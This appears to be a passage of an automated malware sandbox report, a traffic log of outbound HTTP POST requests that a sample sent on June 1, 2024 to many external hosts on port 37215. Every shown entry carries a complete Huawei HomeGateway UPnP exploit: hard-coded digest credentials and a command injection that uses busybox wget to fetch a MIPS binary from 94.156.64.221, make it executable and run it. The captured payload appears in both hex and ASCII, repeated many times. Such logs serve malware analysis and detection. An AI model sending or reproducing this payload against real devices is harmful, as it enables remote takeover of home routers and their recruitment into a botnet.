74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    385192.168.2.2342860156.86.90.22437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259706974 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    386192.168.2.2355908197.165.52.20337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259764910 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    387192.168.2.2338666197.174.153.5337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259864092 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    388192.168.2.236076041.102.253.12737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259917974 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    389192.168.2.2333794156.84.73.5037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259968996 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    390192.168.2.2335538197.48.200.25337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260018110 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    391192.168.2.234268841.69.68.10537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260063887 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    392192.168.2.234560241.198.182.737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260121107 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    393192.168.2.2337114197.204.11.10737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260163069 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    394192.168.2.2350294156.164.69.21037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260266066 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    395192.168.2.2343740197.163.157.25337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260401011 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
